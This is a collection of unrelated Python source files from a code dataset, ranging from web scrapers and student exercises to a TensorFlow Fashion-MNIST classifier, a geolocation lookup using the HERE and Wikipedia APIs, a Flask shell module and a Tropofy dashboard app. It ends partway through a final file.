postcode(self, value: str):\n self._postcode = value if value else ''\n\n @property\n def aantal_reviews(self) -> int:\n return self._aantal_reviews\n\n @aantal_reviews.setter\n def aantal_reviews(self, value: str):\n self._aantal_reviews = extract_integer(value)\n\n @property\n def coords(self) -> Point:\n return self._coords\n\n @coords.setter\n def coords(self, value):\n try:\n lon = extract_float(value[0])\n lat = extract_float(value[1])\n except (IndexError, TypeError):\n lat, lon = -1, -1\n self._coords = Point(lon, lat)\n\n @property\n def country(self) -> str:\n return self._country\n\n @country.setter\n def country(self, value: str):\n self._country = value if value else ''\n\n @property\n def reviews(self) -> list:\n return self._reviews\n\n @reviews.setter\n def reviews(self, value):\n self._reviews = [extract_integer(r.string) for r in value] if value else [-1] * 5\n\n @property\n def data(self) -> tuple:\n attrac = (\n 'NEW',\n self.title,\n self.link.path,\n self.tripadvisor_id,\n self.rating,\n self.straat,\n self.postcode,\n self.plaats,\n self.country,\n self.aantal_reviews,\n *self.reviews,\n self.coords.x,\n self.coords.y\n )\n if len(attrac) != 17:\n print('Warning: attractie != 17')\n\n self.print_()\n return attrac\n\n def print_(self):\n print(\n f\"Attractie(titel={self.title}, \"\n f\"id={self.tripadvisor_id}, \"\n f\"rating={self.rating}, \"\n f\"aantal_reviews={self.aantal_reviews}, \"\n f\"coord={self.coords}, \"\n f\"link={self.link.path})\"\n )\n\n def from_link(self, headless: bool = True):\n self._response = Response(self.link.geturl(), headless=headless, init=True)\n\n wait = [\n (self._xpath_staticmap_element, 0.1), # works: 1, 0.5\n (\"//span[@class='_82HNRypW']\", 0.1) # works: 0.5, 0.25\n ]\n self.response.get_response(wait_for_elements=wait)\n self.response.create_soup()\n\n def find_details_in_script_header(self, key: Any) -> dict:\n try:\n script = self.response.soup.find('script', {'type': 'application/ld+json'})\n value = find_value_nested_dict(key, json.loads(script.string)) or {}\n\n except (TypeError, AttributeError):\n return {}\n\n return value\n\n def find_title(self):\n title = self.find_details_in_script_header('name')\n\n if not title:\n try:\n title = self.response.soup.find('span', {'class': 'IKwHbf8J'}).get_text(strip=True)\n except AttributeError:\n pass\n\n self.title = title\n\n def find_ta_id(self):\n try:\n res = re.search(\n r'^/[\\w]+-g([0-9]+)-d([0-9]+)',\n self.link.path,\n re.IGNORECASE\n ).group(2)\n\n except (AttributeError, ValueError, TypeError):\n self.tripadvisor_id = -1\n\n else:\n self.tripadvisor_id = res\n\n def find_rating(self):\n if self.aantal_reviews == -1: # Geen reviews, geen rating.\n rating = None\n\n else:\n rating = self.find_details_in_script_header('ratingValue')\n\n if not rating:\n try:\n content = self.response.get_css_properties(\n elem=[\"span.uq1qMUbD._2n4wJlqY\", \"span.uq1qMUbD._2vB__cbb\"],\n by='css',\n prop=\"content\",\n pseudo=':after'\n )\n full = [repr(f).count(\"\\\\ue129\") for f in content]\n half = [repr(h).count(\"\\\\ue12a\") * 5 for h in content] # 0 of 1\n rating = f'{min(full)}.{max(half)}'\n\n except (TypeError, ValueError):\n # min/max throw valueerror on empty list\n rating = None\n\n self.rating = rating\n\n def find_aantal_reviews(self):\n aantal_reviews = self.find_details_in_script_header('reviewCount')\n\n if not aantal_reviews:\n try:\n aantal_reviews = self.response.soup.find('span', {'class': '_82HNRypW'}).get_text()\n except AttributeError:\n pass\n\n self.aantal_reviews = aantal_reviews\n\n def find_adres_straat(self):\n self.straat = self.find_details_in_script_header('streetAddress')\n\n def find_postcode(self):\n self.postcode = self.find_details_in_script_header('postalCode')\n\n def find_plaats(self):\n self.plaats = self.find_details_in_script_header('addressLocality')\n\n def find_country(self):\n coun = self.find_details_in_script_header('addressCountry')\n self.country = coun.get('name', None)\n\n def find_coords(self):\n def find_map(x):\n return str(x).startswith('https://maps')\n\n # [i['src'] for i in self.response.soup.find_all('img') if 'src' in i.attrs]\n try:\n coords = self.response.soup.find('img', {'src': find_map})\n\n if coords:\n coords = coords.get('src', None)\n\n else:\n imgs = [i['src'] for i in self.response.soup.find_all('img')\n if 'src' in i.attrs and i.get('src', '').startswith('/data/1.0/maps')]\n coords = urlparse(imgs[0]).query if imgs else None\n\n coords = parse_qs(coords)['center']\n coords = str(coords).split(',')\n\n except (AttributeError, IndexError, TypeError, KeyError, ValueError):\n self.coords = None\n\n else:\n self.coords = coords\n\n def find_reviews(self):\n try:\n soup = self.response.soup\n reviews = soup.find_all(\n 'span', {'class': 'location-review-review-list-parts-ReviewRatingFilter__row_num--3cSP7'}\n )\n\n if not reviews:\n reviews = soup.find_all('span', {'class': 'eqh_0ztw'})\n\n except AttributeError:\n self.reviews = []\n\n else:\n self.reviews = reviews\n\n def get_attractie(self, headless: bool):\n self.from_link(headless=headless)\n\n self.find_coords()\n self.find_title()\n self.find_aantal_reviews()\n self.find_rating()\n self.find_adres_straat()\n self.find_country()\n self.find_plaats()\n self.find_postcode()\n self.find_ta_id()\n self.find_reviews()\n","sub_path":"tripadvisor/scrape_3.py","file_name":"scrape_3.py","file_ext":"py","file_size_in_byte":10257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"46146796","text":"text = input(\"Text: \")\nword_list = text.split()\ni = 0\nmax_word_length = 0\nword_group = {}\nfor words in word_list:\n words = words.lower()\n if words in word_group:\n word_group[words] += 1\n else:\n word_group[words] = 1\n if len(words) > max_word_length:\n max_word_length = len(words)\nordered_word_list = list(word_group.keys())\nordered_word_list.sort()\n\nfor words in ordered_word_list:\n print(\"{:{}} : {}\".format(words, max_word_length, word_group[words]))\n\n","sub_path":"prac_05/word_occurrences.py","file_name":"word_occurrences.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"457383343","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.firefox.options import Options\n\n\nurl = 'https://www.oddsportal.com/soccer/africa/africa-cup-of-nations-2008/cameroon-egypt-I1u1cV7k/'\noptions = Options()\noptions.headless = False\n\nbrowser = webdriver.Firefox(options=options)\nbrowser.get(url)\ninitial_odd_data = browser.find_elements_by_css_selector('td.right.odds')\nprint(initial_odd_data)\n\nhov = ActionChains(browser).move_to_element(initial_odd_data[6])\nhov.perform()\nrequiredHtml = browser.page_source\nsoup = BeautifulSoup(requiredHtml, 'html.parser')\nhelp_box = soup.select('span.help')[0].text\nprint(help_box)\n\n\n","sub_path":"get_onmouse.py","file_name":"get_onmouse.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"600794622","text":"class Train:\n\n def __init__(self, num_cars):\n self.num_cars = num_cars\n\n def __repr__(self):\n return \"{} car train\".format(self.num_cars)\n\n def __len__(self):\n print(self.num_cars)\n\n\n# gajayana = Train(4)\n# print(gajayana)\n# len(gajayana)\n\n\ndef is_even(k):\n return k & 1 == 0\n\n\ndef is_multiple(n, m):\n return n == m * int(n / m)\n\n\nprint(is_multiple(4, 4))\n\n\ndef yes_or_no():\n count = 1\n while count < 100:\n if count % 2 == 1:\n yield \"yes\"\n else:\n yield \"no\"\n count += 1\n\n\ngen = yes_or_no()\nprint(next(gen))\nprint(next(gen))\nprint(next(gen))\n\n\ndef get_multiples(number=0, count=10):\n if number == 0 and count == 10:\n for x in range(1, count + 1):\n yield x\n else:\n for y in range(1, count + 1):\n yield number * y\n\n\ndefault_get_multiple = get_multiples()\ncustom_get_multiple = get_multiples(2, 3)\nprint(list(default_get_multiple))\nprint(list(custom_get_multiple))\n\n\ndef get_unlimited_multiples(nums=1):\n count = 1\n while True:\n yield nums * count\n count += 1\n\n\nsevens = get_unlimited_multiples(7)\nl7 = [next(sevens) for i in range(15)]\nprint(l7)\n\n\n# [7, 14, 21, 28, 35, 42, 49, 56, 63, 70, 77, 84, 91, 98, 105]\n\n\ndef adjacentElementsProduct(inputArray):\n result = -1000\n tmp = -1000\n if isinstance(inputArray, list):\n for x in range(len(inputArray) - 1):\n temp = inputArray[x:x+2]\n tmp = max(temp[0] * temp[1], tmp)\n result = tmp\n return result\n\n\nprint(adjacentElementsProduct([-23, 4, -3, 8, -12]))\n\n\n","sub_path":"section26oopPart2/trainsExercise.py","file_name":"trainsExercise.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"349349512","text":"afstandkm = int(input('Voer de afstand van uw reis in: '))\nleeftijd = int(input('Voer uw leeftijd in: '))\nweekend = input('Is het weekend? ')\n\ndef standaardprijs(afstandkm): #Bepaal de standaard prijs op basis van de reisafstand\n if afstandkm > 0:\n if afstandkm >= 50:\n return afstandkm * 0.60 + 15 #15 starttarief, €0,60 per KM\n else:\n return afstandkm * 0.80 #€0,80 per KM\n\n else:\n return 0\n\ndef ritprijs(leeftijd, weekend, afstandkm): #Bepaal de uiteindelijke prijs op basis van het feit of het weekend is, de reisafstand en de leeftijd.\n\n prijs=standaardprijs(afstandkm)\n\n if weekend.lower() == \"ja\": #Converteer string naar boolean\n isweekend = True\n else:\n isweekend = False\n\n if leeftijd < 12 or leeftijd >= 65: #Leeftijd check voor korting.\n if isweekend: #Korting voor 12- en 65+. Extra korting voor weekendritten.\n return prijs * 0.65 #30% koritng\n else:\n return prijs * 0.70 #35% koritng\n\n else:\n if isweekend: #Korting voor weekendritten\n return prijs * 0.60 #40% korting\n else:\n return prijs\n\nprint(ritprijs(leeftijd, weekend, afstandkm))\n","sub_path":"FA3.py","file_name":"FA3.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"73671197","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\n\nfig_1 = plt.figure(num = 1)\nax_1 = Axes3D(fig_1)\n\nfig_2 = plt.figure(num = 2)\nax_2 = Axes3D(fig_2)\n\n# X, Y value\nX = np.linspace(-3, 3, 40)\nY = np.linspace(-3, 3, 40)\nX, Y = np.meshgrid(X, Y)\nprint(X.shape, Y.shape)\n\n# height value\nZ_1 = np.abs(X) + np.abs(Y)\nZ_2 = np.square(X) + np.square(Y)\n\nax_1.plot_surface(X, Y, Z_1, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))\nax_2.plot_surface(X, Y, Z_2, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))\n\nax_1.contourf(X, Y, Z_1, zdir='z', offset = -0.1, cmap=plt.get_cmap('rainbow'))\nax_2.contourf(X, Y, Z_2, zdir='z', offset = -0.1, cmap=plt.get_cmap('rainbow'))\n\nplt.show()\n\nmain_path = os.getcwd() + '/'\nfig_1.savefig(main_path + '3d_L1.png', dpi = 1080)\nfig_2.savefig(main_path + '3d_L2.png', dpi = 1080)\n","sub_path":"vis_losses_3d.py","file_name":"vis_losses_3d.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"364804996","text":"import plotly.express as px\r\nimport pandas\r\ngame = \"pubg\"\r\npath = \"C:/Users/Usuario/Documents/Visual Studio Code/dashboard/game_popularity/popularity_en/{}.csv\".format(game)\r\npop = pandas.read_csv(path)\r\niso = pandas.read_csv(\"C:/Users/Usuario/Documents/Visual Studio Code/dashboard/game_popularity/countries_iso_rectified.csv\")\r\niso_dic = {} #dicionário que relaciona os países a seus códigos iso\r\n\r\nfor i in range(252):\r\n iso_dic[iso.Country[i]] = iso.ISO[i]\r\n\r\niso_column = [] #coluna com códigos iso, eles aparecerão na mesma ordem que os países em pop \r\n\r\nfor country in pop.Country:\r\n iso_column.append(iso_dic[country])\r\n\r\niso_df = pandas.DataFrame(iso_column, columns=[\"ISO\"])\r\n\r\ndf = pandas.concat([pop, iso_df], axis=1) #concatenar horizontalmente os dois dataframes\r\n\r\n\r\nfig = px.choropleth(df, locations=\"ISO\",\r\n color=\"Popularity\",\r\n hover_name=\"Country\",\r\n color_continuous_scale=px.colors.sequential.Plasma)\r\nfig.show()\r\n","sub_path":"game_popularity/game_popularity_heatmap.py","file_name":"game_popularity_heatmap.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"98295881","text":"# -*- coding:utf-8 -*-\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import * # datasets, layers, optimizers(优化器), Sequential(容器), metrics(测试器)\n\n# 数据预处理\ndef preprocess(x,y):\n\tx = tf.cast(x,tf.float32)/255.0\n\ty = tf.cast(y,tf.int32)\n\treturn x,y\n\n# 加载数据\n(x, y), (x_test, y_test) = datasets.fashion_mnist.load_data()\nprint(x.shape, y.shape)\n\n# batch size\nbatchsz = 128\n\n# 将数据切片\ndb = tf.data.Dataset.from_tensor_slices((x,y))\n# 将数据进行预处理并且打乱,然后打包成一个batchsize为128的可迭代对象db\ndb = db.map(preprocess).shuffle(10000).batch(batchsz)\n\ndb_test = tf.data.Dataset.from_tensor_slices((x_test,y_test))\ndb_test = db_test.map(preprocess).shuffle(10000).batch(batchsz)\n\nmodel = Sequential([ # 容器包含五个全连接层\n\tlayers.Dense(256,activation = tf.nn.relu), # 全连接层 [b, 784] => [b, 256]\n\tlayers.Dense(128, activation=tf.nn.relu), # [b, 256] => [b, 128]\n\tlayers.Dense(64, activation=tf.nn.relu), # [b, 128] => [b, 64]\n\tlayers.Dense(32, activation=tf.nn.relu), # [b, 64] => [b, 32]\n\tlayers.Dense(10)] # [b, 32] => [b, 10], 330 = 32*10 + 10\n)\nmodel.build(input_shape = [None, 28*28])\nmodel.summary()\n# 优化器\noptimizer = optimizers.Adam(lr=1e-3)\n\ndef main():\n\tfor epoc in range(30):\n\t\tfor step,(x,y) in enumerate(db):\n\t\t\t# x:[b,28,28] --> [b,784]\n\t\t\t# y:[b]\n\t\t\tx = tf.reshape(x,[-1,28*28])\n\t\t\twith tf.GradientTape() as tape:\n\t\t\t\t# [b,784] --> [b,10]\n\t\t\t\tlogits = model(x)\n\t\t\t\ty_onehot = tf.one_hot(y,depth = 10)\n\t\t\t\t# [b]\n\t\t\t\tloss_mes = tf.reduce_mean(tf.losses.MSE(y_onehot,logits)) # MES = mean square error\n\t\t\t\tloss_ce = tf.reduce_mean(tf.losses.categorical_crossentropy(y_onehot,logits,from_logits = True))\n\t\t\tgrads = tape.gradient(loss_ce,model.trainable_variables)\n\t\t\toptimizer.apply_gradients(zip(grads,model.trainable_variables))\n\n\t\t\tif step%100 == 0:\n\t\t\t\tprint(epoc,step,'loss:',float(loss_mes),float(loss_ce))\n\n\t\ttotal_correct = 0\n\t\ttotal_num = 0\n\t\tfor x,y in db_test:\n\t\t\t# x:[b,28,28] --> [b,784]\n\t\t\t# y:[b]\n\t\t\tx = tf.reshape(x, [-1, 28 * 28])\n\n\t\t\tlogits = model(x)\n\t\t\t# logits --> prob\n\t\t\tprob = tf.nn.softmax(logits,axis=1)\n\t\t\tpred = tf.cast(tf.argmax(prob,axis=1),tf.int32)\n\n\t\t\t# pred:[b]\n\t\t\t# y : [b]\n\t\t\t# correct : [b], True:equal Flase:unequal\n\t\t\tcorrect = tf.equal(y,pred)\n\t\t\tcorrect = tf.reduce_sum(tf.cast(correct,tf.int32))\n\n\t\t\ttotal_correct += int(correct)\n\t\t\ttotal_num += x.shape[0]\n\n\t\tacc = total_correct / total_num\n\t\tprint(acc)\nif __name__ == '__main__':\n\tmain()\n\n\n\n","sub_path":"fashionmnist实战.py","file_name":"fashionmnist实战.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"483282044","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\nimport requests\n\nfrom config import ID_KEY, SECRET_KEY\n\n\nclass Localisation:\n \"\"\"this class gather all the fonctions needed for the program\"\"\"\n\n def run(self, text=\"ou se trouve la tours eiffel\"):\n \"\"\"run the program\"\"\"\n result = {}\n question = self.parser(text)\n geoloc, address = self.map_api(question, \"48.8482,2.3724;r=245799\")\n result[\"here\"] = geoloc\n result[\"address\"] = address\n wiki = self.wiki_api(geoloc)\n result[\"wiki\"] = wiki\n result[\"status\"] = \"true\"\n return result\n\n def parser(self, text):\n \"\"\"parse the input text and extract the place researched \"\"\"\n regex = r\"(ou se trouve|comment s'appelle|adresse|situe| \\\n trouve )(\\s+)(?P.*\\b)?\"\n test_str = text\n matches = re.finditer(regex, test_str)\n for r in matches:\n print(r.group(\"question\"))\n return r.group(\"question\")\n\n def map_api(self, name, zone):\n \"\"\"send a request to the HERE API for the search's coordinates\"\"\"\n session = requests.Session()\n url = \"https://places.demo.api.here.com/places/v1/discover/search\"\n params = {\n \"app_code\": SECRET_KEY,\n \"app_id\": ID_KEY,\n \"in\": zone,\n \"pretty\": \"True\",\n \"q\": name,\n \"result_types\": \"place\"\n }\n request = session.get(url=url, params=params)\n data = request.json()\n address = data[\"results\"][\"items\"][0][\"vicinity\"]\n address = address.replace(\"
\", \" \")\n data = data[\"results\"][\"items\"][0][\"position\"]\n data = [str(data[0]), str(data[1])]\n return data, address\n\n def wiki_api(self, localisation):\n \"\"\"send a request to the Wikipedia API to find\n info about a localisation\"\"\"\n session = requests.Session()\n url = \"https://fr.wikipedia.org/w/api.php\"\n localisation = str(localisation[0])+\"|\"+str(localisation[1])\n params = {\n \"format\": \"json\",\n \"generator\": \"geosearch\",\n \"prop\": \"coordinates|pageimages|extracts|info\",\n \"inprop\": \"url\",\n \"pithumbsize\": 144,\n \"ggscoord\": localisation,\n \"ggslimit\": \"5\",\n \"ggsradius\": \"10000\",\n \"action\": \"query\",\n \"exintro\": \"True\",\n \"explaintext\": \"True\",\n }\n request = session.get(url=url, params=params)\n data = request.json()\n places = data['query']['pages']\n results = []\n for k in places:\n title = places[k]['title']\n abstract = places[k]['extract']\n thumbnail = places[k]['thumbnail']['source'] if \\\n \"thumbnail\" in places[k] else ''\n article_url = places[k]['fullurl']\n place_loc = (places[k]['coordinates'][0]['lat'],\n places[k]['coordinates'][0]['lon'])\n results.append({\n 'title': title,\n 'abstract': abstract,\n 'thumbnail': thumbnail,\n 'articleUrl': article_url,\n 'localisation': place_loc})\n return results\n\n\nif __name__ == \"__main__\":\n app = Localisation()\n app.run()\n","sub_path":"parser_man.py","file_name":"parser_man.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"496808900","text":"import numpy as np\nimport tensorflow as tf\n#import edward as ed\n\n\n#from edward.models import Normal\nfrom scipy.stats import multivariate_normal, norm\n\nclass MixDiagGaussian(object):\n def __init__(self,means,stds,weights,dim):\n self.components = self.gen_components(means,stds,dim)\n self.means = means\n self.stds = stds\n self.weights = weights\n self.dim = dim\n\n def gen_components(self,means,stds,dim):\n components = []\n if dim > 1:\n for m,s in zip(means,stds):\n #print('check component',m,s)\n dist = multivariate_normal(mean=np.ones(dim)*m,cov=np.ones(dim)*s)\n components.append(dist)\n else:\n dist = norm(loc=m,scale=s)\n components.append(dist)\n return components\n\n def log_prob(self,x):\n return np.log(self.prob(x))\n \n def prob(self,x):\n cp = 0.\n for w,c in zip(self.weights,self.components):\n #print('check x',x[0])\n #print('check c parm',sess.run(c.loc))\n #print('check c prob',np.sum(sess.run(c.prob(x))==0.))\n cp += w * c.pdf(x)\n '''\n p = cp[:,0]\n \n for d in range(1,self.dim):\n p += cp[:,d]\n #lp = tf.log(p[0])\n print('check logp',sess.run(p))\n '''\n return cp\n\n def sample(self,size=1):\n ids = np.random.choice(len(self.weights),size=size,p=self.weights)\n ss = np.zeros([size,self.dim],dtype=np.float32)\n for i in range(len(self.weights)):\n idx = ids==i\n ss[idx] = np.random.normal(loc=self.means[i],scale=self.stds[i],size=(int(np.sum(idx)),self.dim)).astype(np.float32)\n #print(ss[:5])\n return ss ","sub_path":"base_models/mixture_models.py","file_name":"mixture_models.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"2105468","text":"import time\n\n\nclass Condition(object):\n '''\n API操作功能组合\n '''\n\n def __init__(self,conf):\n self.conf = conf\n self.wx = conf.ui.Weixin(conf)\n #self.ADMIN_LC = conf.admin.LOCATOR\n self.SHOP_PARAM = conf.param.Shop\n self.Utils = conf.Utils\n\n def add_a_second_kill_act(self):\n pass\n\n def add_a_product(self,param=None,onsale=True):\n '''\n 添加一个商品,默认上架\n '''\n pd = self.conf.api.Shop(self.conf)\n if param == None:\n param = self.SHOP_PARAM(self.conf).product_add()\n resp = pd.product_add(param)\n product_id = resp['errmsg']['product']['id']\n print(\"ProductID:\",product_id)\n if onsale:\n payload = {\"ids\":[product_id]}\n pd.product_on_sale(payload)\n return product_id\n\n def del_a_product(self,id):\n '''\n 删除一个商品\n '''\n pd = self.conf.api.Shop(self.conf)\n payload = {\"ids\":[id]}\n pd.product_del(payload)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Test/wkd/lib/combo/condition.py","file_name":"condition.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"405357009","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nShell context functions.\n'''\nimport os\nimport shutil\nimport click\nfrom flask import current_app\nfrom flask.cli import with_appcontext\nfrom bloggins.database import models\n\n\n@with_appcontext\ndef routes():\n ''' Get Flask app routes.'''\n routes = []\n click.echo('Getting routes..')\n for rule in current_app.url_map.iter_rules():\n route = 'uri: {rule} <> .name: {endpoint} <> methods: {methods}'\n routes.append(route.format(\n rule=rule,\n endpoint=rule.endpoint,\n methods=rule.methods))\n for route in routes:\n print(route)\n return\n\n\n@with_appcontext\ndef clean(root=None, matches=['.pyc', '__pycache__']):\n '''Recursively delete files and or directories matching pattern.\n\n Args:\n root :: str, root file path to begin recursion\n matches :: list or str, patterns to check against\n '''\n if root is None:\n root = os.path.dirname(current_app.root_path)\n\n if not isinstance(matches, list):\n matches = [matches]\n\n for obj in os.listdir(root):\n path = os.path.join(root, obj)\n for pattern in matches:\n if pattern in obj:\n click.echo(\"Deleting: {path}\".format(path=path))\n if os.path.isdir(path):\n shutil.rmtree(path)\n else:\n os.remove(path)\n break\n else:\n if os.path.isdir(path):\n clean(path, matches)\n\n\n@with_appcontext\ndef seed():\n '''Seed the database with some data'''\n click.echo('Seeding the database with posts and tags..')\n models.Entry.seed(20)\n models.Tag.seed(3)\n","sub_path":"bloggins/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"2117895","text":"from simplekml import Kml\r\n\r\nfrom sqlalchemy.schema import Column, ForeignKeyConstraint, UniqueConstraint\r\nfrom sqlalchemy.types import Float, Integer, Text\r\n\r\nfrom tropofy.app import AppWithDataSets, Step, StepGroup\r\nfrom tropofy.database.tropofy_orm import DataSetMixin\r\nfrom tropofy.widgets import Chart, KMLMap, SimpleGrid\r\n\r\n\r\ndef make_step_group(name, steps):\r\n \"\"\"Make group where steps are an array of tuples with name, widgets.\"\"\"\r\n step_group = StepGroup(name=name)\r\n for step in steps:\r\n step_name, step_widgets = step\r\n step_group.add_step(Step(name=step_name, widgets=step_widgets))\r\n return step_group\r\n\r\n\r\nclass StoreExpensesPieChart(Chart):\r\n def get_chart_type(self, app_session):\r\n return Chart.PIECHART\r\n\r\n def get_table_schema(self, app_session):\r\n return {\r\n 'store': ('string', 'Store'),\r\n 'expenses': ('number', 'expenses'),\r\n }\r\n\r\n def get_table_data(self, app_session):\r\n results = []\r\n stores = app_session.data_set.query(Store).all()\r\n for store in stores:\r\n performances = app_session.data_set.query(\r\n Performance).filter_by(store_name=store.name).all()\r\n results.append({\r\n 'store': store.name,\r\n 'expenses': sum(p.expenses for p in performances)\r\n })\r\n return results\r\n\r\n def get_column_ordering(self, app_session):\r\n return ['store', 'expenses']\r\n\r\n def get_chart_options(self, app_session):\r\n total_expense = sum(\r\n p.expenses for p in app_session.data_set.query(Performance).all()\r\n )\r\n title = 'Company Expenses: Total = ${expense}'.format(\r\n expense=str(total_expense))\r\n return {'title': title}\r\n\r\n\r\nclass PeformanceBarChart(Chart):\r\n def get_chart_type(self, app_session):\r\n return Chart.BARCHART\r\n\r\n def get_table_schema(self, app_session):\r\n return {\r\n 'year': ('string', 'Year'),\r\n 'sales': ('number', 'Sales'),\r\n 'expenses': ('number', 'expenses'),\r\n }\r\n\r\n def get_table_data(self, app_session):\r\n results = []\r\n years = [\r\n year for row in\r\n app_session.data_set.query(Performance.year).distinct()\r\n for year in row\r\n ]\r\n for year in years:\r\n performances = app_session.data_set.query(\r\n Performance).filter_by(year=year)\r\n results.append({\r\n 'year': year,\r\n 'sales': sum(p.sales for p in performances),\r\n 'expenses': sum(p.expenses for p in performances)\r\n })\r\n return results\r\n\r\n def get_column_ordering(self, app_session):\r\n return ['year', 'sales', 'expenses']\r\n\r\n def get_order_by_column(self, app_session):\r\n return 'year'\r\n\r\n def get_chart_options(self, app_session):\r\n return {\r\n 'title': 'Company Performance',\r\n 'vAxis': {\r\n 'title': 'year',\r\n 'titleTextStyle': {'color': 'red'}\r\n }\r\n }\r\n\r\n\r\nclass Store(DataSetMixin):\r\n name = Column(Text, nullable=False)\r\n latitude = Column(Float, nullable=False)\r\n longitude = Column(Float, nullable=False)\r\n\r\n @classmethod\r\n def get_table_args(cls):\r\n return (UniqueConstraint('name', 'data_set_id'),)\r\n\r\n\r\nclass Performance(DataSetMixin):\r\n store_name = Column(Text, nullable=False)\r\n year = Column(Integer, nullable=False)\r\n sales = Column(Float, nullable=False, default=0)\r\n expenses = Column(Float, nullable=False, default=0)\r\n\r\n @classmethod\r\n def get_table_args(cls):\r\n return (\r\n UniqueConstraint(\r\n 'store_name',\r\n 'year',\r\n 'data_set_id'\r\n ),\r\n ForeignKeyConstraint(\r\n ['store_name', 'data_set_id'],\r\n ['store.name', 'store.data_set_id'],\r\n ondelete='CASCADE',\r\n onupdate='CASCADE',\r\n ),\r\n )\r\n\r\n\r\nclass MyKMLMap(KMLMap):\r\n def get_kml(self, app_session):\r\n kml = Kml()\r\n stores = app_session.data_set.query(Store).all()\r\n for store in stores:\r\n kml.newpoint(\r\n name=store.name,\r\n coords=[(store.longitude, store.latitude)]\r\n )\r\n return kml.kml()\r\n\r\n\r\nclass Application(AppWithDataSets):\r\n def get_name(self):\r\n return 'Franchise Management'\r\n\r\n def get_examples(self):\r\n return {'Demo Data for Brisbane North': self.load_example_data}\r\n\r\n def get_gui(self):\r\n step_groups = []\r\n\r\n step_groups.append(\r\n make_step_group('Input', [\r\n ('Stores', [SimpleGrid(Store)]),\r\n ('Performances', [SimpleGrid(Performance)])\r\n ])\r\n )\r\n\r\n step_groups.append(\r\n make_step_group('Output', [\r\n ('Viz', [\r\n {'widget': PeformanceBarChart(), 'cols': 6},\r\n {'widget': StoreExpensesPieChart(), 'cols': 6},\r\n {'widget': MyKMLMap(), 'cols': 12}\r\n ])\r\n ])\r\n )\r\n\r\n return step_groups\r\n\r\n @staticmethod # to ensure self does not get passed in\r\n def load_example_data(app_session):\r\n app_session.data_set.add_all([\r\n Store(name=\"CLAYFIELD\", latitude=-27.417536, longitude=153.056677),\r\n Store(name=\"SANDGATE\", latitude=-27.321538, longitude=153.069267)\r\n ])\r\n\r\n app_session.data_set.add_all([\r\n Performance(\r\n store_name=\"CLAYFIELD\", year=2011, sales=1000, expenses=400),\r\n Performance(\r\n store_name=\"CLAYFIELD\", year=2012, sales=1170, expenses=460),\r\n Performance(\r\n store_name=\"SANDGATE\", year=2011, sales=660, expenses=1120),\r\n Performance(\r\n store_name=\"SANDGATE\", year=2012, sales=1030, expenses=540),\r\n ])\r\n","sub_path":"te_starter/starter.py","file_name":"starter.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"466357417","text":"\"\"\" Problem 16\n2 ** 15 = 32768 and the sum of its digits is 3 + 2 + 7 + 6 + 8 = 26.\nWhat is the sum of the digits of the number 2 ** 1000?\nhttps://projecteuler.net/problem=16 \"\"\"\n\n\ndef pds(p):\n s, n = 0, 2 ** p\n\n while n:\n s, n = s + n % 10, n // 10\n\n return s\n\nprint(pds(1000))\n","sub_path":"1_to_100/11_to_20/016_power_digit_sum.py","file_name":"016_power_digit_sum.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"38169183","text":"\"\"\"\nGiven two non-negative values, print true if they have the same last digit, such as with 27 and 57.\nlastDigit(7, 17) → true \nlastDigit(6, 17) → false\nlastDigit(3, 113) → true\n\"\"\"\n\n\nnum1=int(input('Enter num1 - '))\nnum2=int(input('enter num2 - '))\n\nif(num1>=0 and num2>=0):\n num1=num1%10\n num2=num2%10\n\n if(num1==num2):\n print('true')\n else:\n print('false')\n \n\n \n","sub_path":"python prog/pythonFudamentalsNew/prog_3_last_digit_same.py","file_name":"prog_3_last_digit_same.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"183874246","text":"# -*- coding: utf-8 -*-\n\"\"\"Episode: 3-3.蜘蛛のスレッド/蜘蛛の糸\n\"\"\"\n## path\nimport os\nimport 